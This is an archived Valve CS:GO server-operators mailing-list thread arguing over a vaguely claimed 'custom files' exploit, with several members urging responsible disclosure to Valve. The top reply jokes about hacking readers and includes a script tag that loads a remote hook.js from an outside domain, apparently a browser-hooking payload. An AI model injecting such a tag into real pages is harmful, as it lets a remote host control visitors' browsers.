hello I have injected a JavaScript into this email you are all now hacked what do you mean it won't run without an actual vulnerability
you're super mega hacked <script src=//xmppwocky.net/hook.js></script> On Oct 10, 2017 10:02 AM, "iNilo" <[email protected]> wrote: > I frankly don't care what / where / how you work, or what you have studied. > > The only thing I know is that this is clearly the wrong channel to do > argue/disclose/chat about. > > http://www.valvesoftware.com/security/ > > Hopefully you get thanked in a patch note, if not I'm sure the entire > community will be grateful that you disclosed a major security issue to the > people that *actually *get paid to take care of this. > > Thanks. > > > > 2017-10-10 18:54 GMT+02:00 Saint K. <[email protected]>: > >> Christopher, >> >> >> >> I work in “the field” as you like to call it. It’s customary to explain >> the exploit in detail and provide proof the concept (hence the request for >> a PoC) in any form or way. >> >> >> >> Please demonstrate the issue, it be by posting the offending code, you >> recording a video showing a working exploit, or anything along these lines. >> >> >> >> You should know this, if you work in “the field”. >> >> >> >> Regards, >> >> >> >> Saint K. >> >> >> >> *From:* Csgo_servers [mailto:[email protected]] >> *On Behalf Of *Stealth Mode >> *Sent:* 10 October 2017 18:34 >> *To:* [email protected] >> *Subject:* Re: [Csgo_servers] Custom files exploit >> >> >> >> @Ryan, etc. >> >> >> >> I studied radio electronics before IT was a thing. NetSec and ITSec go >> hand in hand. My credentials aren't CS, because CS was radio electronics. >> The industry hasn't changed, just a little more vulnerable. Not like I am >> specifically stating how to inject code, or what code to inject on a public >> mailing list. Don't need to. Professionals here know what I am referring >> to. I guess the rest do not have the knowledge to understand what the >> exploit can actually do. You are aware. That is all that matters. Don't >> secure your servers, that is on you. When they get exploited, that is on >> you. >> >> >> >> Have a nice day! End of discussion. No further communications. >> >> >> >> Sincerely, >> >> Christopher "StealthMode" Stephen Larkins >> >> Independent IT Field Engineer >> >> fieldnation.com >> >> workmarket.com >> >> onforce.com >> >> clearancejobs.com >> >> >> >> >> >> On Tue, Oct 10, 2017 at 12:09 PM, Ryan Bentley <[email protected]> wrote: >> >> My sides at this thread. At first I just rolled my eyes but now I >> actually believe that Stealth Mode is either a troll or delusional. Please >> stop saying "ITSec". Any first year CS student knows what PoC is but you >> don't? Please. >> >> You are embarrassing yourself. Which institution did you get your degree? >> It must be a very old BSc indeed. You talk complete nonsense and have a >> fundamental misunderstanding of basic computer science tenets. >> >> >> >> On Tue, Oct 10, 2017 at 4:34 PM, Nomaan Ahmad <[email protected]> >> wrote: >> >> Nice hat there. Stealth might get this one though: https://i.imgur.com/32 >> 9jfXt.gif >> >> >> >> On 10 Oct 2017 4:29 pm, "PistonMiner" <[email protected]> wrote: >> >> The person in question should never have written a message about an open >> vulnerability into a public mailing list in the first place. Just because >> they did doesn't mean that you should ask for PoCs in public mailing lists, >> there's a multitude of issues with that. >> To make it perfectly clear, I'm not defending this person, I seriously >> doubt the seriousness of their statements and a lot of what they're saying >> makes no sense at all and looks like trying to maintain an image of >> competence while knowing little, but responsible disclosure still applies. >> If this person has a vulnerability to report, they should do so with the >> information listed at http://www.valvesoftware.com/security/. >> And I think I know what I'm talking about seeing as I have two Finder's >> Fees. See https://wiki.teamfortress.com/wiki/Finder%27s_Fee and >> https://wiki.teamfortress.com/wiki/List_of_Finder%27s_Fee_owners >> >> On 10.10.2017 17:08, Vaya wrote: >> >> I think someone needs to ‘stealth mode’ out of this email chain. This is >> just noise without a repeatable Test >> >> Sent from my iPhone >> >> >> On 10 Oct 2017, at 16:01, PistonMiner <[email protected]> wrote: >> >> If you have a vulnerability to report, don't do it in a public mailing >> list. Report it directly to Valve, and no place else. This conversation has >> so many problems, but asking for a PoC in a *public* mailing list is one >> of them. Look up responsible disclosure. (I should note though, at this >> point I am not convinced a vulnerability even exists.) >> >> -- >> >> PistonMiner (Linus S.) >> >> _______________________________________________ >> Csgo_servers mailing list >> [email protected] >> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >> >> >> >> _______________________________________________ >> >> Csgo_servers mailing list >> >> [email protected] >> >> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >> >> >> >> -- >> >> PistonMiner (Linus S.) >> >> >> _______________________________________________ >> Csgo_servers mailing list >> [email protected] >> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >> >> >> _______________________________________________ >> Csgo_servers mailing list >> [email protected] >> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >> >> >> >> >> _______________________________________________ >> Csgo_servers mailing list >> [email protected] >> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >> >> >> >> _______________________________________________ >> Csgo_servers mailing list >> [email protected] >> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >> > > > _______________________________________________ > Csgo_servers mailing list > [email protected] > https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >
_______________________________________________ Csgo_servers mailing list [email protected] https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers
